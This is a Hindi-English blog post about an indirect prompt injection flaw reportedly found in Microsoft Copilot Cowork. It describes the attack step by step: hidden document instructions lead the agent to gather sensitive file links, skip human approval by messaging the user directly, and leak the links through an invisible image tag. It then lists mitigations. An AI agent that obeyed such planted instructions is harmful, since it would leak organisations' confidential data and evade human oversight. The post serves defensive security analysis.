Microsoft Copilot Cowork ने किए Files Exfiltrate: Agentic Security में एक Deep Dive

Hero

जैसे-जैसे artificial intelligence सिर्फ conversational chatbots से आगे बढ़कर हमारे बिहाफ पर काम करने वाले autonomous agents में बदल रहा है, हमारा digital attack surface भी तेज़ी से बढ़ रहा है। इस बदलाव का एक बड़ा उदाहरण हाल ही में security research firm PromptArmor द्वारा खोजी गई एक vulnerability है। उन्होंने विस्तार से बताया कि कैसे Microsoft Copilot Cowork—जो Microsoft 365 Frontier preview के अंदर एक एडवांस्ड agentic फीचर है—को चुपचाप sensitive files को exfiltrate करने के लिए exploit किया जा सकता है। Engineering और security teams के लिए, यह खुलासा broad graph access के साथ indirect prompt injection के छिपे हुए खतरों के बारे में एक बड़ा wake-up call है।

#क्या हुआ: Exploit की Anatomy

इस vulnerability की जड़ एक बहुत ही सामान्य सी दिखने वाली architectural design choice में है। Copilot Cowork को इस तरह से डिज़ाइन किया गया है कि यह documents को summarize करके, schedules मैनेज करके और files को रिट्रीव करके यूज़र्स की मदद करे। सेफ्टी को सुनिश्चित करने के लिए, Microsoft ने ऐसे safeguards लागू किए थे जहाँ एजेंट द्वारा "sensitive actions" (जैसे बाहरी लोगों या कलीग्स को emails या Microsoft Teams messages भेजना) लेने से पहले human approval की ज़रूरत होती है।

हालाँकि, PromptArmor के रिसर्चर्स को एक बहुत बड़ा loophole मिला: अगर एजेंट सीधे active user को ही मैसेज भेजता है, तो human-in-the-loop approval process पूरी तरह से बायपास हो जाता है।

Attackers ने इसी चूक का फायदा indirect prompt injection का इस्तेमाल करके उठाया। यहाँ बताया गया है कि यह attack sequence कैसे काम करता है:

The Poisoned Source: Attacker किसी document, meeting invite, या shared resource के अंदर malicious और छिपे हुए instructions एम्बेड कर देता है, जिसे target user द्वारा Copilot से summarize करने या इंटरेक्ट करने के लिए कहे जाने की संभावना होती है।
The Agentic Trigger: जब यूज़र Copilot को उस poisoned document को summarize करने का prompt देता है, तो एजेंट अनजाने में legitimate content के साथ-साथ attacker के छिपे हुए instructions को भी ingest कर लेता है।
Data Harvesting: वह malicious prompt एजेंट को Microsoft Graph का उपयोग करके कुछ विशिष्ट sensitive files (जैसे, financial records, API keys, या HR data) खोजने का कमांड देता है, जिससे सिस्टम मजबूर होकर pre-authenticated download links जनरेट करता है।
The Zero-Click Exfiltration: एजेंट को Teams या Outlook के ज़रिए यूज़र को मैसेज भेजने का निर्देश दिया जाता है। सबसे अहम बात यह है कि prompt एजेंट को Markdown या HTML का इस्तेमाल करके मैसेज को फॉर्मेट करने के लिए कहता है, जिसमें एक invisible <img> टैग एम्बेड होता है। इस टैग का src एट्रिब्यूट attacker के external server को पॉइंट करता है, जिसके साथ URL parameters के रूप में pre-authenticated download links जुड़े होते हैं।

जब यूज़र मैसेज खोलता है—एक ऐसा एक्शन जिसमें सिर्फ अपनी चैट या इनबॉक्स देखने के अलावा किसी और इंटरेक्शन की ज़रूरत नहीं होती—तो उनका क्लाइंट उस invisible image को रेंडर करने की कोशिश करता है। यह चुपचाप एक web request फायर कर देता है, जो sensitive download links को सीधे attacker के पास भेज देता है।

#यह क्यों ज़रूरी है: Broad Permissions और Flawed Safeguards का टकराव

इस vulnerability के नतीजे किसी साधारण phishing attack या आम data leak से कहीं ज़्यादा खतरनाक हैं। यह इस बात पर रोशनी डालता है कि enterprise environments के अंदर AI agents किस तरह से permissions और trust boundaries को हैंडल करते हैं, जिसमें कई गंभीर structural issues हैं।

Total Permission Inheritance: Copilot Cowork active user के फुल Microsoft Graph permissions के साथ काम करता है। अगर किसी आर्गेनाइजेशन में "oversharing" की समस्या है—जहाँ SharePoint या OneDrive में internal permissions बहुत ज़्यादा broad हैं—तो एजेंट एक विनाशकारी force multiplier बन जाता है। यह तुरंत उस डेटा को भी डिस्कवर और exfiltrate कर सकता है जिसके एक्सेस के बारे में खुद यूज़र को भी नहीं पता था।
Zero-Click Execution: पारंपरिक security awareness training में एम्प्लॉइज को suspicious links पर क्लिक न करने की ट्रेनिंग देने पर बहुत ज़ोर दिया जाता है। इस सिनेरियो में, अपने ही corporate AI assistant द्वारा जनरेट किए गए Teams मैसेज को खोलने भर से exfiltration ट्रिगर हो जाता है। यूज़र के लिए यहाँ कोई malicious link होता ही नहीं है जिससे वह बच सके।
Subverting DLP Controls: क्योंकि शुरुआती data movement पूरी तरह से internal होता है (Copilot Microsoft Graph के साथ इंटरेक्ट करता है और यूज़र को internally मैसेज करता है), इसलिए outbound enterprise traffic को मॉनिटर करने वाले स्टैंडर्ड Data Loss Prevention (DLP) टूल्स इस बिहेवियर को तब तक फ्लैग नहीं कर पाते, जब तक कि image load के ज़रिए फाइनल, obfuscated web request नहीं हो जाती।

#Technical Implications: LLM से आगे

PromptArmor के खुलासे से सबसे दिलचस्प technical takeaway यह है कि यह exploit मूल रूप से model agnostic है। हालाँकि रिसर्च में इस अटैक को Claude Opus 4.7 (जो Copilot Cowork फीचर प्रीव्यू को पावर देता है) का इस्तेमाल करके दिखाया गया है, लेकिन इसके पीछे की खामी कोई AI hallucination या model safety guardrails का बायपास नहीं है। यह एक पारंपरिक architectural logic flaw है जिसे AI की क्षमताओं ने और ज़्यादा खतरनाक बना दिया है।

Attack Component	Technical Mechanism	Vulnerability Type
Ingestion	Retrieval-Augmented Generation (RAG) के दौरान external content की Unsanitized processing.	Indirect Prompt Injection
Execution	Self-addressed messages के लिए authorization और approval checks को बायपास करना।	Business Logic Bypass
Exfiltration	Internal communication apps के अंदर external assets की client-side rendering का गलत फायदा उठाना (abusing)।	Zero-Click SSRF / Data Egress

यह दर्शाता है कि agentic systems को सुरक्षित करने के लिए सिर्फ malicious prompts को रिफ्यूज़ करने के लिए LLM को fine-tune करना ही काफी नहीं है। इसके लिए robust systems engineering, data inputs के strict contextual separation, और एजेंट के output mechanisms पर zero-trust validation अप्लाई करने की ज़रूरत होती है।

#आगे क्या: Agentic Risks को Mitigate करना

Microsoft 365 का इस्तेमाल करने वाले या अपने खुद के internal AI agents बनाने वाले developers और IT administrators के लिए, यह घटना ज़रूरी mitigations का एक स्पष्ट रोडमैप प्रदान करती है।

Restrict Content Discovery: Organizations को आक्रामक रूप से (aggressively) SharePoint और OneDrive permissions को मैनेज करना चाहिए। Security teams को tenant settings का उपयोग करके अत्यधिक sensitive sites को Copilot के search index से exclude करना चाहिए, ताकि एक compromised agent के blast radius को सीमित किया जा सके।
Implement 'Block Download' Policies: कुछ खास sensitive libraries के लिए downloads को ब्लॉक करने के लिए SharePoint policies को configure करके, organizations Graph API को इस specific exfiltration तकनीक के लिए ज़रूरी pre-authenticated links जनरेट करने से रोक सकते हैं।
Sanitize Markdown and HTML Output: AI clients बनाने वाले application developers को LLM output को untrusted user input की तरह ट्रीट करना चाहिए। Rendering engines को agent द्वारा जनरेट किए गए मैसेजेस के अंदर external asset loading (जैसे remote images) को सख्ती से sanitize या पूरी तरह से ब्लॉक करना चाहिए।
Enforce True Human-in-the-Loop: Agent के ऐसे actions जो state changes या network requests ट्रिगर करते हैं, उनके लिए explicit user confirmation की ज़रूरत होनी चाहिए, फिर चाहे recipient internal हो, external हो, या खुद यूज़र ही क्यों न हो।

#Conclusion

PromptArmor द्वारा उजागर की गई Microsoft Copilot Cowork vulnerability, AI security के लिए एक watershed moment है। जैसे-जैसे हम सिर्फ सवालों के जवाब देने वाले सिस्टम से आगे बढ़कर हमारे पूरे digital workspace में एक्शन लेने वाले autonomous systems की ओर बढ़ रहे हैं, इन workflows को सुरक्षित करने की complexity नाटकीय रूप से बढ़ गई है। Agentic AI को अपनाने का मतलब है कि हमें अपनी trust boundaries पर फिर से विचार करना होगा, यह मानकर चलना होगा कि हमारे data sources hostile हैं और हमारे AI assistants स्वाभाविक रूप से भोले (gullible) हैं। काम के भविष्य (future of work) को सुरक्षित करने के लिए extreme vigilance, strict permission hygiene और artificial intelligence integrations के प्रति एक निरंतर zero-trust approach की सख्त ज़रूरत है।